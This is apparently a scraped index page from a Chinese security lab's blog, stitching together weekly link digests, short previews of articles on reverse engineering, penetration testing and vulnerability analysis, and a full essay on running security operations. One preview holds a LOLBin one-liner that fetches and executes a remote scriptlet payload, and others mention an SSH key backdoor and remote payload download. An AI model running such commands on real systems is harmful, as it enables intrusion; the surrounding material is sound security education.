5月23日-5月29日5月16日-5月22日5月09日-5月15日雷石安全实验室商务咨询：0571-87031601商务邮箱：mtn@motanni.com

中并进行相应的配置，这样访问者可以使用固定的电脑无需输入密码就可以访问到服务器，在一定程度上安全和便利兼得，但是其实这里有一个不常用的参数非常适合用来做后门——command通常运维人员通过

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.05.23-2023.05.29】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【逆向分析】IOS逆向(一)-破解某币app加密数据https://mp.weixin.qq.com/s/mJj9IZYeqMcfXcSodsL3TA（内容预览）2.【逆向分析】逆向脱壳（三）

句柄前的地址！来到这个地址.5.在这里,按F2下断点！然后按SHIFT+F9来到断点处！6.这时候我们已经跳过了所有异常,然后去掉断点，按F8慢慢向下跟踪很快就到达OEP了.虚拟壳脱壳

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.05.16-2023.05.22】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【漏洞分析】CVE-2023-28771

win7-win11用法：vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

伪装成正常应用程序查看以下海莲花APT组织的木马样本，为了迷惑受害者，将图标更换为常用软件的图标，一旦用户双击点开邮件附件，软件仍然会正常运行，后台却在悄悄地执行恶意代码，导致电脑被控。

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.05.09-2023.05.15】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【安全技术】一段自解密

Authentication(0x00)"

ret绝对地址跳转，使用memcpy_s写入要跳转的HookedMessageBox函数地址到挂钩机器码数组中。如果使用方式一进行jmp相对地址跳转则修改为下面这样：void

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.05.02-2023.05.08】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【代码审计】记一次springboot项目漏洞挖掘https://mp.weixin.qq.com/s/EOUy7uSSD0Xxgkr7-auj9Q（内容预览）2.【代码审计】Jackson调用链自动化发掘思路https://mp.weixin.qq.com/s/1WWnimgWzT2enzaRyjEDeg（内容预览）3.【安全技术】（DFIR报告翻译）Cobalt

PIN，替代谷歌账号密码。谷歌指出，当用户登录谷歌账号时，只需要解锁设备就可以直接进入账号，无需再输入密码或进行二次验证，不仅大大节省时间，也极大提高了安全性。此外，与密码不同，

，可用于威胁情报检测。微步威胁感知平台

目录，用于管理该目录的访问和资源。2、管理组：管理组是一个容器，可帮助你跨多个订阅管理访问、策略和合规性。管理组提供了一种应用治理控制和分层管理资源的方法。3、订阅：订阅管理账单并控制对

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.04.18-2023.04.24】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【CTF】工控安全竞赛之应用程序逆向分析技术https://mp.weixin.qq.com/s/6sb6q0959Nb-Z1eTi5Uprg（内容预览）2.【CTF】第三届”红明谷“杯网络安全大赛Writeuphttps://mp.weixin.qq.com/s/ralbshb4kDYaOccqbT9I9g（内容预览）3.【SRC】两个账户劫持案例https://mp.weixin.qq.com/s/4dLer3UkGGMfhbq_iiFyxA（内容预览）4.【内网渗透】网络安全渗透之主机持久化https://www.freebuf.com/articles/system/363740.html（内容预览）5.【安全技术】冰蝎4.0流量分析及魔改https://xz.aliyun.com/t/12453（内容预览）6.【代码审计】AVA代码审计-天喵商城https://www.freebuf.com/articles/web/364477.html（内容预览）7.【漏洞分析】Thinkphp5.1POP追踪及POC编写(详)https://xz.aliyun.com/t/12457（内容预览）8.【漏洞分析】OpenSSH

反“反调试”篇雷石安全实验室商务咨询：0571-87031601商务邮箱：mtn@motanni.com觉得文章不错，记得【点赞、在看、转发】！！！

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.04.11-2023.04.17】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【移动安全】破解百元注册码实现内购https://forum.butian.net/share/2216（内容预览）2.【渗透测试】后渗透之windows中远程下载文件tipshttps://mp.weixin.qq.com/s/Ax0CaErM3F6VCctTB2KaHA（内容预览）3.【红蓝对抗】Beacon内存特征修改绕过卡巴斯基https://mp.weixin.qq.com/s/cnX-6dQmUd0OQMikR2FG0g（内容预览）4.【红蓝对抗】RedTeam

.文件路径：C:\Windows\System32\Presentationhost.exeC:\Windows\SysWOW64\Presentationhost.exe支持系统：Windows

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.04.04-2023.04.10】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【移动安全】XposedJnitracehttps://bbs.kanxue.com/thread-276715.htm（内容预览）2.【java代码】还用

计算机底层基础网络安全运营工作浅谈（一）雷石安全实验室商务咨询：0571-87031601商务邮箱：mtn@motanni.com转发，点赞，在看，安排一下？

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.03.28-2023.04.03】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【安全工具】tql高质量常用字典，提高渗透效率!https://mp.weixin.qq.com/s/9J3ho0zJKjFfvuz4_g8SBg（内容预览）2.【安全工具】ChatGPT代码审计的工具

硬件断点：NtClose函数在释放无效句柄时。如果没有被调试，那么函数返回FALSE。如果处于调试状态则会抛出异常C0000008H

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.03.21-2023.03.27】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【安全工具】一款新的Dump

个寄存器，每个寄存器都有一个特有的名称AX，BX，CX，DX，SP，BP，SI，DI，IP，FLAG，CS，DS，SS，ES，但这些寄存器功能只有三种：1.

点击上方蓝色字关注我们~一周网安知识汇总雷石安全实验室【2023.03.14-2023.03.20】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【安全技术】Docker

最新报告：不明来源的攻击者利用零日漏洞针对政府和大型组织，导致操作系统和文件损坏以及数据丢失。消息来源：https://www.anquanke.com/post/id/287452#

前言好久不见，今天来聊聊威胁情报-telegram消息监控一般需要监控的威胁情报来源包含以下几个方面：1、暗网论坛和交易网站2、黑客论坛3、聊天群组4、公共渠道而需要监控的内容大多都是0day情报、数据泄漏事件等，由于上述内容质量参差不齐，更有内容纯粹是诈骗，所以针对相关数据来源需要进行二次鉴别，并只能做为信息参考。此外，如果有相关情报产生，厂商也应第一时间进行排查，确定消息真伪，并做好防护。telegram消息监控telegram上存在很多数据、漏洞、shell贩卖的行为，虽然消息大多都是假的，但是如果我们能对相关群聊进行监控，发现有相关行为，提取关键内容发送到指定地点，可以大大帮助我们做好威胁情报支撑工作。经过查询，telegram

一周网安知识汇总雷石安全实验室【2023.03.07-2023.03.13】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【事件分析】拼多多apk内嵌提权代码，及动态下发dex分析https://github.com/davinci1010/pinduoduo_backdoor（内容预览）2.【工具推荐】移动逆向定制romhttps://github.com/dqzg12300/MikRom（内容预览）3.【工具推荐】Ladon渗透机器人

一周网安知识汇总雷石安全实验室【2023.02.22-2023.02.28】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【漏洞情报】漏洞速递

前言在一次复现畅捷通任意文件读取漏洞的过程中，发觉这个“任意文件读取”漏洞其实暗藏了大坑。通过网上检索，一大堆的文章和工具都是copy只提到文件读取。复现过程1.首先就是用网上

一周网安知识汇总雷石安全实验室【2023.02.15-2023.02.21】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【IOT安全】原创Paper

#01国家漏洞库CNNVD：关于微软多个安全漏洞的通报近日，微软官方发布了多个安全漏洞的公告，其中微软产品本身漏洞76个，影响到微软产品的其他厂商漏洞2个。包括Microsoft

前言渗透测试的灵魂是信息收集，本体是在漏洞利用。收集到的资产和信息越多，你的突破点就越多，因为你找到了别人没有找到的，你测了他没有测试的，你已经领先在了起跑线上，而src得用大量的时间去做信息收集，src比的不只是技术，更比的的是耐心，细心。信息收集篇第一步：厂商域名:厂商的域名可以通过爱企查，企查查这类的工具去搜索主域名他曾用过的一些域名免费会员:https://mp.weixin.qq.com/s/h1qdBXeS4KoFzLyRVAf_LQicp备案也可以，但是注意要输入公司名全称另外推荐奇安信的鹰图平台，可以用关键词查询备案网站第二步：子域名：将收集到的域名进行子域名挖掘，针对子域名以下几点：通过SSL证书查询:crt.sh

一周网安知识汇总雷石安全实验室【2023.02.08-2023.02.14】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【漏洞分析】PowerShell远程代码执行漏洞(CVE-2022-41076)分析与复现https://mp.weixin.qq.com/s/WL6_qay_q0lW3NmxD9-VtQ内容预览：2.【渗透测试】第51篇：某运营商外网打点到内网横向渗透的全过程https://mp.weixin.qq.com/s/AVEydEVTWqcOMVcA7amBVA内容预览：3.【渗透测试】如何巧用burp安排某系统https://mp.weixin.qq.com/s/g1KKVdcdY3ILQbwG0YzINA内容预览：4.【CTF】CTF区块链

Server是一种高性能的Java应用服务器，可用于构建、运行、集成、保护和管理内部部署和外部部署的动态云和Web应用。1月31日，IBM发布安全公告，修复了IBM

前言本人最初在工作现场参与网络安全防护(监控告警封IP)工作，经过长时间的摸爬滚打，逐渐从一名只会监控安全设备的“黑铁”成长为对于整体网络安全运营工作有了初步的了解的“青铜”。而以下内容则是个人成长过程中对于网络安全运营工作的理解和思考，希望通过这个系列文章帮助大家更好的去做安全运营体系化建设。网络安全运营理解网络安全运营是什么？如何将现有的安全防护工作做得更好的这个过程就是安全运营的核心体现，换句话来说，安全运营的核心就在于提升和持续输出价值，对于企业网络安全防护建设来说，如果只按照等保标准开展那企业的安全得分就是60分勉强及格而已，而安全运营工作则是通过不额外增加安全设备的情况下，将企业的安全得分提高到85分，那剩下的15分则是因为现有体系建设中存在我们安全能力覆盖区域的空白，而缺失的能力并不能通过安全运营工作去凭空创造。网络安全运营建设阶段安全运营工作覆盖到了整体安全防护工作当中的方方面面，而安全运营的理念在不同的安全建设阶段的展现也不同。第一阶段：设备闲置阶段企业按照等级保护的标准采购各类安全设备，无专门的安全人员发挥设备应有的价值，该阶段称之为设备闲置阶段，防火墙负责访问控制，WAF负责web应用防护，IPS负责入侵防护，态势感知负责整体安全防护，但仅仅依靠设备本身的防护能力往往是不够的，可以说这些设备在企业内部发挥的安全作用微乎其微。安全运营理念在设备闲置阶段的体现则是建立常态化的日常防护工作，将仅仅依靠设备本身的安全能力提升为由人利用安全设备保障企业网络安全运行。通过建立常态化的日常防护工作发挥设备应有的安全能力，在这一个阶段是从单纯设备的防护模式转变为“人+设备”的防护模式，网络安全的本质依然是人与人的对抗，而人是整个安全运营从始至终不可缺少的一环。第二阶段：能力挖掘阶段能力挖掘阶段顾名思义就是挖掘企业安全防护能力，从技术层面上讲，优化现有设备安全防护能力，减少设备误报，更新设备规则；从管理层面来讲，优化原有常态化工作模式，建立完善的管理流程。安全运营工作并不是通过各类安全设备的叠加增强安全能力，而是通过技术与管理结合的形式将企业现有的安全能力进行最大化展现。第三阶段：运营转型阶段运营转型阶段则是安全运营理念在每个不同的企业具像化展现，安全运营工作是要结合企业实际的工作场景，并不是1:1复制其他企业的安全运营模式就能够符合企业的发展需要。每个企业的安全防护体系面临的问题是不相同的，企业面向服务对象不同，企业业务不同，企业网络架构形式不同等等一系列的因素影响都会导致企业的安全防护需求不同，而运营转型阶段则是随着时间的积累，对于企业运行模式的了解，逐步衍生出符合不同企业自身的网络安全运营模式。第四阶段：查漏补强阶段查漏补强阶段则是在持续平稳开展运营工作后，通过日常的工作积累发现部分安全能力的缺失是无法通过安全运营工作提供，由企业领导测评估是否需要进行相关安全防护能力的补充。而查漏补强阶段也分为两部分，“查漏”部分是发现企业现有安全防护能力无法覆盖的安全区域盲点，需要结合日常运营的需求挖掘梳理企业需要建设的安全能力，并不是无脑接入未涉及的安全防护设备。“补强”部分不同于能力挖掘阶段，安全设备本身是存在能力上限的，而补强部分是通过建设新的能力完善优化现有的安全运营工作。查漏补强阶段应关注的问题一是企业的安全投入是否能够消除同等价值的安全风险隐患，企业是否面临相关风险，风险发生概率性，风险发生造成影响都是决定是否需要进行安全投入的参考因素。二是能力补强工作本身属于锦上添花的操作，不同规模的企业对于安全运营的需求标准其实并不一致，该阶段需要根据企业自身情况进行调整，不应该让锦上添的“花”成为安全工作开展的负担。第五阶段：运营优化阶段安全运营本身的核心就是提升，安全运营工作本身也需要优化，内部形成符合企业特色的安全运营的考核指标，例如：安全事件响应时长、处理时长、漏洞修复时间、威胁情报产出率、WEB检测规则盲区等指标，结合考核指标发现目前安全运营工作中存在的问题，梳理运营工作优先级，合理分配人员的工作精力，持续优化安全运营的工作模式。网络安全保障体系WPDRRC模型是信息安全专家提出的适合中国国情的信息系统的安全保障体系建设模型，包括六个环节和三大要素，六个环节包括预警、防护、检测、响应、恢复和反击，具有较强的时序性和动态性，可以反映出信息系统安全运营体系的能力。三大要素包括人员、策略和技术，人员是核心，策略是桥梁，技术是保证。三大要素落实在WPDRRC模型6个环节的各个方面，将安全策略变为安全现实。网络安全运营工作场景在不同的网络安全运营建设阶段，重点开展的工作也并不相同，按照实际工作中自身参与的部分工作进行梳理，形成了网络安全运营整体概念图，由基础安全设备提供安全能力，人员作为运营核心，流程作为保证，共同。安全设备仅提供基础安全能力，安全运营本身也建设在一定的安全能力之上，基础安全能力的覆盖面则决定了安全防护能力的上限。基础工作为针对企业现有的安全设备建立常态化工作流程，为保障日常防护的需要，需要梳理内部安全架构以及资产情况，安排人员参与监控预警以及事件处置工作，企业内部定期开展渗透测试及整改加固工作。运营工作则是针对常态化工作内容进行优化调整，包括明确组织架构，优化防护流程，对于公司现有设备策略进行调优，度量企业安全防护能力，预先梳理应急响应预案，提升实战攻防演练能力，同时加强溯源反制及威胁狩猎能力。总结人、数据、工具、流程共同构成了安全运营的基本元素，以威胁发现为基础，以分析处置为核心，以发现隐患为关键，以推动提升为目标通常是现阶段企业的安全运营的主旨。安全运营更像是技术和管理的合理结合，通过人员的培养，流程的定义，设备的优化最终帮助企业将安全体系建设做到符合企业实际情况的最优解，不刻意追求精益求精，也不忽略可解决的问题。安全运营本身覆盖了安全建设场景的方方面面，针对企业的安全建设工作，安全运营更像是一个自由度极高的养成游戏，不同的人会有不同的运营方法和理念，不同的企业也需要不同的运营方式，企业的安全能力最终会被养成不同的方向，这也是安全运营工作最有趣的地方在于你需要经过你自身的思考去寻找最优解，这是单纯地看告警封IP所体验不到的快乐，网络安全运维工程师和网络安全运营工程师其实仅仅是一字之差，而两种岗位其实差距也就在于能否改变自身的想法从安全整体看待问题，运营是将固定的安全工作做出新的高度，运维是将自己的思想困陷在固定的安全工作当中，改变自己思维，以现有的安全工作为基，提升看待安全的视角，挖掘现有能够提升的空间，寻找能够解决问题的答案，这就成为了一名安全运营工程师。未完待续安全运营包含了安全建设工作的方方面面，而我能够提炼总结也只是运营工作的冰山一角，后续本人将陆续通过这种浅谈的方式分享具体安全运营工作如何开展，从实际工作出发凝练出个人对于安全运营的理解，也想通过这一栏目文章的分享讲述安全运营工作从基础到进阶的养成过程，不管是从企业安全建设出发，还是从个人能力提升出发，我都希望我的想法能够为大家带来一点帮助，也希望我的想法在乐于交流同行的碰撞下能够为自己带来提升。往期回顾01关于OPENVPN流量传输的测试及应用思考02一道RWCTF体验赛的逆向题03ThinkPHP多语言rce复现分析雷石安全实验室商务咨询：0571-87031601商务邮箱：mtn@motanni.com

一周网安知识汇总雷石安全实验室【2023.02.01-2023.02.07】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【流量分析】关于OPENVPN流量传输的测试及应用思考关于OPENVPN流量传输的测试及应用思考内容预览：2.【车联网安全】CAN协议分析之流量监听与重放https://mp.weixin.qq.com/s/wUGsyqTyXjq4mVbReiNLEw内容预览：3.【小程序测试】针对小程序的漏洞挖掘https://mp.weixin.qq.com/s/I-5k14VhHFm0LVQF9QFpGQ内容预览：4.【IOS逆向】IOS逆向--恢复Dyld的内存加载方式https://mp.weixin.qq.com/s/lZcod-HNq6wEnrAF95a69w内容预览：5.【漏洞分析】phpstudyRCEhttps://mp.weixin.qq.com/s/uIeJIUQtica6EYcJ7PYcpQ内容预览：6.【漏洞情报】ImageMagick任意文件读取漏洞POC

突发奇想相信“阳康”的小伙伴居家办公的场景还历历在目，那VPN想必大家一定不会陌生，那不知道大家会不会有这么一个疑问，VPN服务端与客户端的流量传输是否真的安全的？那刚好我有一个朋友想知道连着公司VPN一边工作一边摸鱼会不会被发现？于是带着这个疑问开展了对于VPN服务端与客户端之间的流量传输的测试。说干就干此次模拟仿真服务为OpenVPN服务，核心技术是虚拟网卡和加密传输，OpenVPN是一个全特性的SSL

一周网安知识汇总雷石安全实验室【2023.01.10-2023.01.16】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【代码审计】记一次文件下载getshell白盒https://mp.weixin.qq.com/s?内容预览：2.【代码审计】一次对在线文档预览的JAVA代码审计https://forum.butian.net/share/2088内容预览：3.【无线安全】对"卷帘门"遥控器信号分析https://mp.weixin.qq.com/s?内容预览：4.【无线安全】BLE协议安全入门https://mp.weixin.qq.com/s?内容预览：5.【渗透测试】实战｜一次Node.js站点渗透https://mp.weixin.qq.com/s?内容预览：6.【渗透测试】记一次对某站点的渗透测试(bypass)https://xz.aliyun.com/t/12041

已公开，漏洞的现实威胁进一步提升，建议客户尽快做好自查，及时更新至最新版本。消息来源：https://www.secrss.com/articles/5100103Juniper

前言周末参加了一下RWCTF体验赛（正赛搞不动），做了道安卓的逆向题，挺有意思，分享下我的思路。运行直接拖进手机，发现是个贪吃蛇游戏，通过四个方向划动控制蛇蛇的方向，那可能就要通关或者长度达到一定条件才能拿到flag：

一周网安知识汇总雷石安全实验室【2023.01.02-2023.01.09】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【CTF】RealWorld

前言前段时间爆出的ThinkPHP多语言rce很有意思，最近刚好有时间就学习一下。一、漏洞信息利用条件：1.安装并已知pearcmd.php的文件位置。（默认位置

个人收藏隔空投送最近使用应用程序文稿桌面下载<

一周网安知识汇总雷石安全实验室【2022.12.20-2022.12.26】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【漏洞分析】记一次Apache某项目的漏洞复现与挖掘https://mp.weixin.qq.com/s?内容预览：2.【漏洞分析】从0到1RMI\JNDI\fastjsonhttps://xz.aliyun.com/t/11967内容预览：3.【漏洞分析】Apache

Server新的利用链的技术细节，并将其命名为"OWASSRF"消息来源：https://www.secrss.com/articles/5036302国家漏洞库CNNVD：关于Fortinet

漏洞简介大家都说这个漏洞是上传漏洞，其实这个不是上传漏洞，是远程文件下载漏洞。思路类似于我们打内网的时候远程wget或者certutil直接把payload或者exe下载到目标机器上，然后运行上线。利用参考https://www.cnblogs.com/hei-zi/p/13394764.html这里主要讲源码的部分。ueditor

一周网安知识汇总雷石安全实验室【2022.12.06-2022.12.12】本栏目内容由雷石安全实验室整理，主要分享国内外优秀文章和github优秀项目。微信链接可直接点击，外部链接需要复制黏贴后打开哦。1.【漏洞分析】ThinkPHP远程代码执行漏洞复现https://mp.weixin.qq.com/s?内容预览：2.【漏洞分析】Yapi

SmartPPT文件上传漏洞”等漏洞的综合评级为“高危”。消息来源：https://mp.weixin.qq.com/s/2A95o0eNr7C0xpejph0muw03ThinkPHP